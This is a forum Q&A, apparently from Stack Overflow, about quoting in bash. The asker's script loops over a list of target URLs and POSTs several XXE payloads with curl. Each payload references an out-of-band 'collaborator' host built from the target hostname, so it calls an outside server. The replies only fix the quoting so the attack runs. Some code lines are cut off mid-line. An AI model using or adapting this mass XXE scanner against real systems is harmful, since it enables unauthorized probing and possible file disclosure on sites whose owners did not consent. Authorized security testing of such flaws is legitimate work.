# Iterate with curl in the --data-binary parameter from array

Tags: linux, bash, curl, string-parsing, data-processing

I want to iterate with --data-binary because I need different payloads and I can't use a file because one of the parameters affects the file and don't want to create files.

What I try to do is this:

```
#!/bin/bash


if [ "$#" -ne 2 ]; then
    echo "xxemassive <urlist> <urlcollaborator>"

else

for j in $(cat /root/Documents/testscripts/urls.txt); do

a=`echo $j|cut -d "/" -f 3`;

payloads=(

'<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://'$a'.'$2'">'

'<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "https://'$a'.'$2'/?xxe">]> <SOAP-ENV:Envelope> <SOAP-ENV:Body> <getStatus> <id>>

'<?xml version="1.0"?>\x0d\x0a<!DOCTYPE foo SYSTEM "http://'$a'.'$2'">' )

echo $j
for i in "${payloads[@]}"
do
echo $i
curl -i -s -k  -X $'POST' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Content-Type: text/xml'  --data-binary  '@${i}' -m >
done


done
```

I have tried:

```
--data-binary  '@${i}' -> Payload is none
--data-binary  '${i}' -> Payload is ${i}
--data-binary  ${i} -> Payload is <!DOCTYPE, then <?xml (it has a weird behavior like it iterates over the string.
--data-binary  $i -> Same weird behavior as with ${i}
```

The thing is when I do `echo $i` inside the array that iterates the array of payloads, it outputs exactly what I want the curl to use as --binary-data, but I cannot manage it.

Regards

Comment: Have you tried "$i" ? which gives a single argument.

Comment: pffffffffffff you made my day, YES it works with the Goddamn "$i" thank you so much, really

Comment: last question, now I want to use 3 parameters: and I want the third one to be here:

`curl -i -s -k  -X $'POST' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Content-Type: $3' --data-binary  "$i" -m 4 -x http://127.0.0.1:8080  $j 1>/dev/null;`  The result is I see in my request: Content-Type: $3, no the value. Thanks

Comment: You should use `"Content-Type: $3"`

Comment: @aDoN https://stackoverflow.com/help/someone-answers